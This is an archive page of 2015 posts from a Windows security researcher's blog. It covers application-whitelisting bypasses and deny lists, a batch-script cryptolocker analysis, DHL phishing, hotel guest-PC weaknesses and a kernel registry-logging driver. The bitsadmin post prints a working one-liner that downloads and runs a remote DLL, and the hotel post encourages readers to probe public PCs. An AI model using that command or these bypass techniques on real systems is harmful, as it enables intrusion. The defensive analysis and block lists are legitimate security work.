2015's Blog Archive - A collection of all blog
posts from the year 2015.

Archive 2015

Last modified 2017/04/17 by Flo

Here you will find my posts from 2015, tl;dr.

Limits of Application Whitelisting

2015/12/07 by Flo

If you are peeking through the scene you may have noticed that Application Whitelisting is currently under fire and security researchers found quite impressive ways to overcome the classic whitelisting approach - whether be it policy based or hash based. Information Security Analyst Casey Smith and SecConsult made a great job analyzing and bypassing whitelisting approaches in the last couple of months and weeks, so I heavily suggest that you check out their stuff.

In a nutshell, most solutions fail in several aspects like: forgetting about interpreter and scripting languages, incomplete or bad user manuals that lead to wrong configuration, bad code quality that lead to exploit or bypass the whitelisting solutions, windows paths that are whitelisted and could be write accessed by attackers, etc. Especially interpreter and scripting languages are a very interesting way to attack an application whitelisting protected machine and often succeed if you one did not configure the whitelist tightly.

We as security guys and hackers know that nothing is absolutely bullet proof, IT security is always a battle of the fittest and often looks like playing cat and mouse. Well, thus your IT security mitigation and defense strategies should always be layered. You should always have different protection strategies in place to jump in, where one dedicated solution may fail. Never stop always rethink your mitigation techniques, keep up to date and check out what the bad black- and white hats are doing.

It hopefully was well known that classic whitelisting will fail when attackers can use (bytecode-) interpreters or reflective in-memory attacks to start malicious code. To avoid such attacks you should do more than just checking the executable intended to run. For example you can check who is calling what - I call this parent checking and implemented it into Tuersteher as well. So you are able to blacklist the browser such, that it cannot start a cmd.exe shell, or any scripting host. I have also implemented several kernel drivers that are able to check on the command line options an executable is going to be started (see command line scanner at Excubits). For example my driver can detect, that the browser wants to start cmd.exe with the /c flag, or that powershell.exe was called with a script from C:\Users\Florian\AppData\Local\Temp\ For example you can whitelist powershell just for some well known (and really needed) command line parameters, and only from source files you know and trust. So an attacker is not able to start these security critical executables with command line options pointing malicious options and references (like malign scripts). I also use a memory protection driver that controls what process has access to the memory of another process. This helps to reduce the attack surface by exploits and other malicious executables that try to inject their code into another legit running application like explorer.exe, svchost.exe, etc.

Well, I know, this will not block all attacks, it is a way to mitigate and makes an successful attack more complicated. There are still gaps like exploits that directly (reflective) load their malware (DLL) into the own exploited application's process. Personally I think that we will encounter more and more in-memory attacks in the near future as anti exploit techniques and protections tools will be armed against the malign stuff we currently see.

I just do not want to blame on whitelisting because I still think it is a great way to mitigate against a whole bunch of basic attacks. If you are down with malware analysis you will confirm that most (~80-90%) of the attacks we see could be blocked by even simple application whitelisting, so you shall implement it. But you should also know the limits and see it as one mitigation out of a bunch of mitigations you need. It is not enough to install application whitelisting and you are done! There is more to do and more to review on a regular basis. IT Security is a moving process, it will never be enough to just install that super cool anti malware and exploit application, you should always keep track on what is going on in the scene and adapt regarding new developments.

For example for now, do a quick start to enhance your current whitelisting configuration following the recommendations here:

  • Blacklist all occurrences of powershell.exe if you do not use it regularely,
  • Blacklist or remove all interpreters (e.g. python, perl, ...) if you do not use them,
  • Blacklist or remove all debuggers,
  • Only whitelist required software, move not used software to the blacklist, and
  • If there is software you only use once a year put it onto the blacklist and then temporarily put it on the whitelist if you really need it for the dedicated task.

Also blacklist the following applications (executables) if you do not need them:

  • *InstallUtil*
  • *Regsvcs*
  • *RegAsm*
  • *wusa*
  • ?:\$Recycle*
  • *reg.exe
  • *vssadmin.exe
  • *aspnet_compiler.exe
  • *csc.exe
  • *jsc.exe
  • *vbc.exe
  • *ilasm.exe
  • *MSBuild.exe
  • *script.exe
  • *journal.exe
  • *msiexec.exe
  • *bitsadmin*
  • *iexpress.exe
  • *mshta.exe
  • *systemreset.exe
  • *bcdedit.exe
  • *mstsc.exe
  • *powershell.exe
  • *powershell_ise.exe
  • *hh.exe
  • *set.exe
  • *setx.exe
  • *InstallUtil.exe
  • *IEExec.exe
  • *DFsvc.exe
  • *dfshim.dll
  • *PresentationHost.exe
  • C:\Windows\ADFS\*
  • C:\Windows\Fonts\*
  • C:\Windows\Minidump\*
  • C:\Windows\Offline Web Pages\*
  • C:\Windows\tracing\*
  • C:\Windows\Tasks\*

I also suggest that you restrict write access permissions on

  • C:\Windows\ADFS\*
  • C:\Windows\Fonts\*
  • C:\Windows\Minidump\*
  • C:\Windows\Offline Web Pages\*
  • C:\Windows\tracing\*
  • C:\Windows\Temp\*
  • C:\Windows\Tasks\*
  • C:\ProgramData\*

such, that you - as a default/normal user - cannot copy (or write) files into one of these folders. Please note, ensure that Windows Update (or the Trusted Installer and Admin) are still able to write into these folders or you gonna end up in some trouble.

If you have any questions or want to discuss. Well, I am open minded and happy to hear from you.

A story about Hotel Business Center PCs

2015/10/30 by Flo

Having a lot of business trips in the last couple of months I also spent some time at hotel lobbies, waiting for colleagues, to check in and out, waiting for the transfer bus or taxi etc. In modern hotels you can enjoy fast WiFi but most hotels also feature guest PCs or a business center where you can use PCs to surf the web, write letters with Word, print PDFs, do some copying etc.

Anyway, being and waiting in hotels is boring, so I stared to check out these hotel lobby and business center PCs I have often encountered, but always ingoned - until now! So, what happened? Well, I lurked around and watched people to see how they use such computers. To my amazement there were a lot of people doing private things on such machines, like opening their web-mail accounts, facebook, twitter, amazon and online-banking, etc. Some opened up their car rental vouchers and flight tickets for printing or rebook etc. So there is a lot of personal information processed on such machines, and a lot of user names and passwords used.

Thus I started to do some basic security checks on these PCs, checking the browser's cache, auto-fill features, etc. It turned out, that these PCs are all running Microsoft Windows (7, or 8.1), Chrome, WinZIP, Adobe Acrobat Reader and Microsoft Office. Most of them are not patched regarding the latest vulnerabilities (I tried ~30 at 10 different hotels across Europe in Germany, Spain, Corsica, Poland, Great Britain). All machines had an Anti Virus in place. There was no additional protection against starting applications or dynamic link libraries. Some had decent SRPs installed, but I was always able managing to injected executables through sticky shell commands or to open file dialogs, etc. Amazingly most systems were protected by some kind of file system virtualization, so after a reboot any unintended software installation or manipulation of the file system was gone. Nice to know, but these systems were only rebooted manually by the hotel staff once a day (around midnight). So if some hotel guest got hit by a drive-by (or if he or she installed malware) early at morning, malware could have enspionaged all subsequent users during the rest of the day.


Well, we security enthusiasts all know that you shall never ever use such machines. But I've kind of hoping that these hotels (and some of them have big names in the scene) are a bit more aware, and shall try to protect theirs hotel lobby or business center PCs better than this. Not just because of protecting their guests, but also because these machines have access to the hotel's network in some fashion. I could think of further attacks starting through attacking such a PC and then go hanky-panky until you reach the hotel’s core IT system (there you have access to debit and credit card information, about guests, etc.). I would have expected that these machines at least be protected by very strict SRPs and that the user is not able to install (start) any application. Especially the latter is very dangerous because it leads that an attacker is able to run his own executable code on such machines, which gives him more power and possibilities!

Well, I did not have the time to do more research on these PCs, but I think this could be very interesting and worth to have an eye on. Just to make one thing clear: I did not install any malware nor anything bad, I just tried to find ways to start applications and libraries - I highly recommend that you also do not to try, because it is illegal! Anyway, this could be an very interesting research project, so next time you are waiting and hanging in your hotel’s lobby, give it a try. Send me an e-mail about your experiences, I am happy to hear about your findings and ideas.

FBI's strange advice on crypto lockers

2015/10/29 by Flo

At Boston's Cyber Security Summit the FBI notes that current Crypto Locker Malware is that good that there is litte you can do against and to recover your encrypted files. They said, "to be honest, we often advise people just to pay the ransom". More details can be read at Well, what to say? It sounds like capitulation and demonstrates the impotence against the cyber crime underground. If you are in IT-security business this is - of course - no breaking news. The organized crime is very good in adapting to new fields for their income and they are getting very professional. It is not like back in the 1990's where just some teenage guys hacked for fun, nowadays we see highly sophsiticated malware written by experts that want to make big money. So no more hacking for fun, it's hacking for profit and the organized crim is already here. I have heard of organized crim gangs that now make more money with cybercrime than with drugs and in the red light district - that should make us think.

Lock Me Down Scotty - A quick analysis of a batch based Cryptolocker

2015/07/23 by Flo

Cryptolockers are no big news these days as they are very common and discussed on security Blogs, conferences and by law enforcement. Well, we were able to catch a new family that is currently not very common in the "scene", so this is why I feature a blog post on a very special cryptolocker that I have observed and analyzed during the last days.

cryptolocker splash screen In a short sum up this piece of malware is not written in C, nor is it a Powershell Script or VBS. It was crafted very simple and tight as a well crafted collection of open source and Windows’ build in console tools; combined wickedly nasty in a more or less simple command line batch script. So what your malware scanner sees is, a bunch of well known command line applications and simple (but obfuscated) batch scripts. In general not very suspicious if you have a quick look on them.

The cryptolocker itself was served as a single exe file that turned out to be a SFX (self extracting executable) WinRAR archive. We catched the file claiming to be some Hollywood Blockbuster movie streaming file with the extension ".Streaming.mpg.exe". The SFX was compiled with the latest version of WinRAR (US version), used a custom, but well designed icon file for curiosity reasons I assume. The SFX silently extracts the archive into the %temp% folder and starts up a batch script afterwards. The stage 1 batch script starts a primitive .vbs file that runs another batch script in a hidden cmd.exe console. I assume that this steps are performed just to avoid getting discovered by the ordinary user. The script also pauses several times and performs some bogus operations on the hidden cmd.exe shell to trick heuristic scanners, and, to fool analysis environments that do not spend too much time on given samples. It also calls Sysinternal's sdelete to clean up the user's folders' free space just to spend some more time doing nothing suspicious at the beginning. The tool sdelete will become a "key feature" later, so keep it in mind.

At the end you will be prompted with a fake error message claiming that a required "streaming codec" is missing. Thus, no FREE "Hollywood Blockbuster" streamed. Well, as I often recommend to friends and customers: Keep your ass away from these sharing sites. License music, pay for watching movies, and buy original software. Anyway, lets move on.

If you see this message it is almost too late. The stage 2 batch script has already called openssl to generate a 2048-bits RSA .x509 certificate. The certificate's subject is interesting:


After generating the certificate the batch script has opened up TOR and submitted the private key to a hidden service into the TOR network (.onion addresses are hard coded into the batch file) by using wget to post the data as a base64 data stream. Again, encoding was done entirely using openssl. Establishing a connection to the TOR network usually takes some time, so this seems to be a clever idea to bump out heuristic and analysis tools, that will not wait for too long. By the way, the user-agent specified for wget can be used to easily identify this kind of threat, because of its odd version of Google Chrome (42.0.1337.007):

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.1337.007 Safari/537.36"

If the hidden service has received the private key it returns a strange reply message "lockMeDownScotty" telling the batch script to continue, and to encrypt all personal files (amongst others these are .jpg, .doc, .xls, .pdf, .txt, .mp3, .raw, ...) on the user’s hard disk, especially in the user’s profile folders. Encrypted files will have the very fitting extension .cryptoLocked, well together with the "lockMeDownScotty", the user-agent and .x509 certificate it seems that these guys shall also think about a career as clowns ☺.

To encrypt the files, the cryptolocker simply uses openssl and securely deletes the original unencrypted files using Sysinternal's sdelete. The secret key and other temp files created by the cryptolocker are all securely deleted using sdelete. So there is little chance to recover any of these afterwards. I tried on my forensics machines but never got a hit. The malware also tries to delete system backups and well known backup files (e.g. .bak, .old, .img, etc. files). If you are not running your system with admin rights all the time, there is a good chance that the attempt to delete the system backups will fail and you are able to recover.

The cryptolocker also tries to get persistent in the registry (using reg.exe) to ensure it is executed every time the user boots up and logs in (typical HKCU\Software\Microsoft\Windows\CurrentVersion\Run\). Although everything is performed in a pure batch file, the malware is clever enough to only generate a single 2048-bit key per user. It also contains a loop that tries to encrypt newly written files once in 30 minutes. After each round of encryption, the user gets prompted with a typical ransom message provided in form of a simple jpg file (see screenshot above) started with the default image viewer and a text (.txt) file opened with Notepad. Nothing special here, it is presented in the same fashion as we all know from other ransom- and cryptolockers. What you see are well known instructions on what to do and how much to pay. One remarkable thing is, that if you pay using bitcoins you only have to pay 0.5 bitcoins whereas if you decide to pay "cash" by using gift cards, it is fairly more: $500.

It is also very interesting that the crooks use TOR to its extends. Not only that they upload the private key using TOR, they also only provide a link to an .onion address to get in touch with them. Most ransomware I have seen so far at least provide an ordinary web link that can be accessed without using TOR and that is hosted by one of the well known bullet-proof hosters or a #pwned server or site.

It seems that their hidden service is not available all the time, I have tried it several times and it was online only a few hours a day. I suppose that it is operated from a private online connection or it moves from one infected machine to another. Currently we are also not sure if this was and is some kind of test balloon, and the crooks prepare a larger attack. The hash of the initial executable is unknown to recent online malware analysis systems. We keep on track and will follow up, if there are any news.

Instead of using WinRAR I assume that other packers can and are used, so you should watch out for packed executables containing at least these files

  • openssl.exe
  • polipo.exe
  • sdelete.exe
  • tor.exe
  • wget.exe
  • libeay32.dll
  • libevent-2-0-5.dll
  • libevent_core-2-0-5.dll
  • libevent_extra-2-0-5.dll
  • libgcc_s_sjlj-1.dll
  • libgnurx-0.dll
  • libssp-0.dll
  • zlib1.dll

with some additional .cmd/.bat files and two or three tiny (2-4 lines of code) .vbs scripts. Since the SFX's hash value can be changed easily it does not make sense to provide it here. We also assume that the scripts may change, so what you shall look for is, the combination of the listed executables above and some scripts in the same package.

Well, since you have to start an initial executable we think the most obvious action to avoid this threat is: Do not start unknown executables, avoid getting tricked by e-mail attachments claiming to be an invoice pdf, tracking code, legal warning etc. Again, do not try to get things for free that normally cost money. From the Exploitbutser framework we have observed that most executables submitted are serial number generators, cracking tools, and alleged full versions of commercial software. So do not wonder if you are getting hit, if you download and execute the latter mentioned illegal stuff.

Personally I think that this is not the end of the story, and we will see more malware in the same fashion coming up soon. Using command line tools in combination with simple scripting is not new, but in this special case somehow a clever idea to get evil things done without implementing stuff from scratch. I think that not so skilled "would be" hackers seem to be able to build quite potent malware without in depth knowledge and coding skills. For example securing communication and using (hidden) servers in the TOR network, using openssl as a strong crypto library looks like that some of them are going this way. Even if such crooks do not understand what they do, building their malware upon such tools and libraries makes this scrap more resistant and secure - unfortunately.

But well, let us wait and see if this was just a may fly.

As always, if you have any questions, comments or suggestions, do not hesitate and contact me.

DHL-Tracking Malware Spam

2015/06/08 by Flo

My spam honeypots got some new DHL tracking spam. DHL is a German national and international parcel shipping service. They also offer professional and global express services as well as customized logistics solutions. Shipments can be tracked through their web page. DHL never sends PDFs containg information about a shipment like in the screenshot on the right hand side. If you would like to see your shipment's state go to DHL's official site and enter the shipment ID and other information like the ZIP code etc.

During the last couple of months cyber crooks used faked DHL tracking PDFs containing a link to the current tracking state of a shipment which allegedly was on the way. Inexperienced users may follow these links and thus download a ZIP file that contains a file in the format DHL_Sendungsverfolgung_2015.pdf.exe. It is yet another trojan that will be installed if an user gets fooled and clicks on the "pdf" that is just an evil exe.

Well, this is nothing new. We see lots of faked invoice and tracking attachments that persuade a user to click on a link, open a ZIP file etc. So what is the deal? Well, the "deal" is that most of the attached executables are truly unknown to all recently updated AVs you might have installed. Even if you are a user that keeps the system and protection software updated you are still in danger. One wrong or too fast click and your system is owned by malware. During the last few weeks we tested the detection rate: It took most AVs up to 24 hours until they were able to detect a single fake pdf.exe that was distributed through a PDF or e-mail link. Well, 24 hours is a long time - enough time to infect hundreds of PCs.

But there is more to say. Cyber criminals are getting smarter. If you are an informed user and check for the linked domain manually, you get forwarded to the official site. Only the full URL will download the trojan ZIP. If you dig deeper there is more to see. The example PDF from above links to: hxxp://

If you do a whois on you see:

If you do a whois on you see:

Well, these smart little crooks are getting tricky. So you better look twice and by the way: Do not trust your AV on new files that seem to be clean. Put them into quarantaine for at least 24 hours until you open them ;-)

There are still some people around me constanly asking: Why shall we use anti-exe or application whitelisting? And why do we not use Windows build in anti-exe features?! Well, this blog post should give you a hint why you MUST use anti-exe these days. And why you cannot use build in technology? Well, there is nothing you can instanly use right out of the box without hassle.

Research on bitsadmin.exe: Microsoft’s built in Malware Dropper?

2015/05/21 by Flo

At this year's RSA-Conference, Marcus Murray has shown how hackers can gain access to a Windows-Server through a combination of weak upload sanity checks and missing execution prevention on the Server. In his detailed presentation he showed how to create a cmd shell on a server that pipes I/O to the hacker’s browser (a.k.a. Browser Shell). The next problem to solve was to upload and execute code using this cmd shell (what he needed was a malware dropper).

He has managed to compile C# code (featuring a simple EXE Dropper) through the cmd shell and was able to execute this executable. It then downloaded and executed a metasploit generated sort of trojan executable from the web. At the end he fully controlled the Windows-Server and was able to dig deep into the network. It was a really cool show case on different techniques hackers combine to attack targets nowadays.

I really liked Murray’s idea of building an on the fly dropper using C# code, then building an executable out of it and starting this executable on the attacked site to download the intended malware. Until now I thought this is one of the smartest ways to get foreign executables downloaded and started, if you do not want to use an in-memory exploit by using all the well known dropping and executing stuff in win32-API. Well, I was wrong.

While analyzing some malware I stumbled over a really clever way to achieve the same thing Murray was doing, but with less steps to perform. Microsoft ships a tool called bitsadmin.exe. With this tool you can download arbitrary files from the Internet. Thus you can also download an executable and then execute it. Well, you could do something like

cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0

This simple line downloads a DLL and starts it with rundll32.exe. Instead of a DLL you could also use an EXE, but I prefer DLLs because they are most likely not blocked by many execution prevention systems on the market in their default configuration. So there is a good chance to pass by, without getting trouble.

Besides the fact that you are able to directly download any file you like, this has also enormous impact for zero days. Analyzing many of them I often see sophisticated exploit code trying to obtain library calling addresses of URLDownloadToFile, WSARecv, recv, recvfrom, InternetReadFileExA, CreateProcess, ShellExecute, LoadLibrary, CreateFile, etc. just to download and run an executable. Well, using this technology attackers will save a damn bunch of such API calls. All they need to do is to call shellexec with the line above. This is awesomely smart.

To finish this blog post: Guys beware, this is not a PoC or just a nice idea. I have seen it in the wild, it is already used by attackers. So beware and watch out for bitsadmin.exe. I would highly recommend to delete or blacklist this executable on your Servers (SOHO Windows, too) if you do not make use of it. By the way, you should additionally blacklist *script.exe, *vbc.exe, *jsc.exe, *ilasm.exe, *csc.exe, *build*, *powershell.exe, *hh.exe, *msiexec.exe. Well, I know sometimes you need one of these executables, but to be honest: In most scenarios you do not. And for everyday word and excel business you again do not need these executables. Protect your system, use black-/whitelisting or SRPs. For more details on what you achieve in level of protection see four simple strategies to mitigate 85% of threats.

If you have any questions do not hesitate and contact me. If you have more dangerous executables to block, other smart ideas to build a Dropper without using win32-APIs let me know. I am always happy to hear from you and appreciate any feedback. Take care!

A kernel based Registry Scanner

2015/04/04 by Flo

It has been a little while since I have posted on forensics drivers. Well, I will now make up the thing and decided to publish my true kernel based Registry scanner. It is yet another filter driver that can help you analyzing malware and its behaviour. The driver fully runs in kernel mode and does not requiry any tool in user mode to work. Back in the days I did registry logging using SSDT and other hooking mechanisms. It worked very well, but it was far away from being a sound and gentle solution. With the RegistryScanner driver things are more streamlined and due to the fact that everything is in the kernel now, it is more difficult for an attacker to pass by.

The driver logs attempts (query, create, rename, delete, replace) to a log file (c:\windows\registryscanner.log). You can simply install the driver through the RegistryScanner.inf. Start it from the console via "net start RegistryScanner" and stop it via "net stop RegistryScanner".

Please note: You shall sign the driver in order to load it into the kernel for both architectures, meaning 32-bit and 64-bit. But you can also disable signature checking on boot up. Just start Windows with enhanced boot option and select the appropriate boot option.

With RegistryScanner you can monitor access to the registry on forensics machines. The driver logs new created processes, so you can easily link the process id to the registry event that occurred. All events will be logged to an text file in Unicode format. The delimiter character is #, so it should be no problem to process a given log with one of the well known scripting languages (e.g. python or ruby). By using a well defined rules set, you can filter out suspicious actions and thus are able to quickly rate given files as probably suspicious. For example you could set up a VM and start up suspicious executables, then use RegistryScanner’s log to check typical autostart locations in the registry etc. You can do the same with well document formats (Word, Excel, PowerPoint, PDF, ...) If you open up an suspicious file, and RegistryScanner’s log file states that a well known autostart location (e.g. Run, DllAttach, Debugger, Service) was altered, it is very likely that your forensics machine was hit by an exploit trying to get persistent. Depending on the rules you have specified, you can quickly rate a given analysis stage without doing deep reverse engineering.

An example log is given here. I have started up regedit.exe, created some keys, renamed and edited them. The first value indicates the process id (PID). On process creation the second value indicates the parent's process id.

8E0 # 954 # \??\C:\Windows\regedit.exe # "C:\Windows\regedit.exe"
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvilExploit
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 0000
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 43003A005C00550073006500720073005C006A006F00650044006F0065005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C006D006D006100700055007000640061007400650072002E006500780065000000
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bang # REG_DWORD_REG_DWORD_LITTLE_ENDIAN # 00000000
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Wert #1
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts # REG_SZ # 0000
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1
8E0 # RegNtRenameKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1 -> Farid
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # RegNtPreDeleteKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # exiting

The driver is still under development, so if you have any questions or comments do not hesitate and contact me. Any feedback is appreciated. I am also interested in the rule sets you guys are using (or you would use to track malware). If you can share I would be happy and provide the information here for other researchers, so everybody benefits.

The driver is and will be free for non-commercial usage. If you use it in your own research projects let me know, so we may exchange knowledge and rules.

You can download the latest package here Enjoy!

Why reinventing the wheel isn't always wrong

2015/03/30 by Flo

I stumpled across this article by evilsocket and fully agree with him.

I often heard from people: this and that is already implemented, why do you waste any time and program your own tool, driver or what ever. They also complain that my solutions are not as perfect as solutions from other (OSS) projects etc... blah, blah...

Well, you might be right, but let me answer you crack-headed, genious egg heads:

" ... do not tell me that during your CS courses you've implemented everything, tried everything and came accross every problem you could find while developing because this is bullshit ... "

I still like to understand how things work internally and behind the scenes. I hate sophisticated, heavy weighted solutions that consume megabytes of space just to solve a tiny problem. I really like hacking and programming and even if one of my solutions is not perfect, I have always learned a lot and have experience that helps me to quickly understand complex IT problems today and in my daily job. I often see average large blab academic dudes failing if it goes into the dirty details and if we leave the well crafted roads - there using libraries from the rod is often no smart idea, because you really need deep knowledge.

Well, here is my suggestion for you: You shall start implementing the stuff, not just using big scale libraries from Java, PHP and Python or copy and paste by googling around. And by the way: keep your good advices, if you aren't a true hacker. I am sick of you smart asses talking about things you've never ever made your hands dirty with!

A huge list of commonly used passwords

2015/03/15 by Flo

I have posted on these brute forcing bots out there, trying to gain access to typical CMS and forum software by trying huge lists of passwords on typical user names. Since 2014 I have set up some honeypots that are collecting such access attempts to well known fake CMS and Blog systems.

I have now merged a list of about 500MBs passwords I have collected so far. This was a research project to test, how many passwords could be collected and about the pass phrases used by these bots. To provide you some benefit out of this project I have build a shrinked down version of these passwords that may help you in finding weak passwords at your site. I have just calculated the sha-512 hash value out of each password, converted the hash value to base64 and extracted the first 5 characters out of the string. Please note: This reduces the overall size and maps several passwords to the same shrinked version.

Why did you do that? Well, regarding German laws and legal codes I am not allowed to publish password lists. It is also not recommended to share hash lists. Using shrinked hash lists does not disclose any valuable information for the bad guys but enables you to check your passwords against this list. If you build the base64 sha-512 hash value of your password(s) and extract the first characters out of the result you can still check it against my list and can see, if you find an hit. If yes, it is more likely that your password is already in a list such bots are using. If you want clear evidence you can contact me.

You can download the list here: shrinked_pwd_hashes.7z

Integrate GPG into your Windows Explorer’s Shell

2015/03/05 by Flo

I like small and tiny installations without the bloat of help files, shiny user interfaces, tray icons, all day running background tasks etc. That's why I implemented the "quick and dirty" GPG4Win Shell integration.

Summarized: This is a shell-extension to integrate GPG encryption into Microsoft Windows Explorer without installing all the bloat GPG4Win usually ships.

How to install:

Extract the content of the file Open up a command prompt (cmd.exe) as administrator. Go to the extracted folder and start the install.cmd script.

If everything works out fine you are now able to en- and decrypt files and folders with GPG4Win by using the Windows context menu (right click on a folder or file). Just select one of the above. A command shell will open up showing some status information and asking you for the recipient’s gpg ID to encrypt or asks for your password to decrypt.

This is it, now have fun encrypting your files with GPG.

Some initial words for 2015

2015/02/08 by Flo

Well, after a lot of work in December and January I am back. Since I have founded Excubits my private Blog was a bit neglected, but I am back again and will post on my blog. The password hash checker is already pipelined and will hopefully released during February, so you can check if your password is already on the lists, these brute-forcing bots are using to log into well known CMS. Having several honeypots set up, I now have a huge collection of passwords. Thanks to all the script kiddies out there, who were heavily penetrating my honeypots in the last few weeks ☺.

Regarding my drivers I have to announce that they will be removed from the Blog. The descriptions and whitepapers will still remain, but all demo versions will just contain a text file linking to Excubits now. So, all related binaries and support will be done through Excubits from now on. If you are interested in Türsteher (Bouncer), MZWriteScanner and ExecutableCheckers, you shall visit my company's web page for demo versions and additional information. You should register for our newsletter, so you will never miss any news. By the way, we are testing Türsteher Plus right now and will start private beta phase soon. Türsteher (Bouncer) Plus will support SHA-2 hash based signatures on executables and will enhance security even better.

Regarding all the other stuff, everything remains as before. The main structure of the Blog remains, there was just a little face lifting as you may have noticed.

Back in the days I featured a blog post on how to easily include Brainpool Curves into OpenSSL (see the archives). I also Big Integers, Public Key Cryptography and especially the ellegance of Elliptic Curve Cryptography, so it is no wonder that I also love TweetNaCl. Hence I am now using JavaScript TweetNaCl for all comments sent through my contact form. But I am also able to receive TweetNaCl-encrypted files. If you like to contact me using TweetNaCl crypto, feel free and make use of my public key:


There will be more at in 2015:

I feel now comfortable enough to announce T!NKle CMS -- my home brew Content Management System that will be featured here soon. It is a true file-based NO-SQL and easy to use CMS for everyone. If you are a web designer you gonna love T!NKle. It is easy to setup, easy to use and fast as hell. Just design your web page in HTML5/CSS, include three or four lines of additional macros into your template and this is it. T!NKle is already in use by third-parties (e.g. and early-bird web designers, they all love its awesome simplicity and instant architecture. You gonna it, too! So stay tuned and watch out for T!NKle.